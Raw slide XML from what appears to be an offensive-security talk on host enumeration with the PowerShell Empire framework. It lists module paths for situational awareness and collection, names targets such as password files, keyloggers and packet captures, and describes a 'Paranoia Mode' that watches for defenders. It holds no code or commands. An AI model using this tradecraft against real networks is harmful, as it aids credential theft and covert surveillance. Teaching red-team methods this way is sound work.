                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-109624"/>
            <a:ext cx="10296614" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Powershell Empire: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ComputerDetails</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A0F9E91-4B01-4102-90A4-DD99304D0E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="661130" y="1318709"/>
            <a:ext cx="10869740" cy="2693667"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFEA1BE5-7FDA-4E7F-8579-26581A7124A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755249" y="4427710"/>
            <a:ext cx="11236726" cy="2062103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Logon Events - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Including Explicit Credential Logons</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>RDP Connections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>PSScripts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Applocker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> Processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417699063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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="-97136"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Paranoia Mode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E35BECD-7B35-4997-AAB2-55C6BFDDC0EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="130192" y="1426889"/>
            <a:ext cx="6096001" cy="5062924"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Continuously check for:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Suspicious Users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Special AD Groups </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Defaults to DA’s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Process names </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Uses a default list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> - AND -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Any processes running off of USB drives!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A9CCAA7-8F14-4FE9-864C-FA7AFC3A4FB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6226193" y="1610929"/>
            <a:ext cx="5882949" cy="4520155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F2F2CF2-1110-4DA0-9A54-49C0BBC128B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6393766" y="6182751"/>
            <a:ext cx="5882949" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>situational_awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/host/paranoia</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="245601344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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Powershell Empire: Host Modules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE3BF9-06B8-45FD-8FEA-E4C57595B790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682464" y="2303648"/>
            <a:ext cx="8484169" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>situational_awareness</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>/host/     modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Use tab completion!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3240A78-4342-4A63-A1AE-FDC2C494E1D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4419054"/>
            <a:ext cx="12183599" cy="1836728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="115290651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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="138491"/>
            <a:ext cx="12191999" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Powershell Empire: Local Collection Modules</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DAE3BF9-06B8-45FD-8FEA-E4C57595B790}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1018005" y="4516318"/>
            <a:ext cx="9944484" cy="1846659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>collection/   modules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Password Files / Keyloggers / Packet Captures</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Use tab completion!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9988056F-9048-4383-9D05-D43CAE21281B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1648864"/>
            <a:ext cx="12192000" cy="2443069"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="374266628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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="877675" y="1987010"/>
            <a:ext cx="10825612" cy="3277820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>Software and Antivirus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>ATA/ATP telemetry</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="145999089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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Host Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
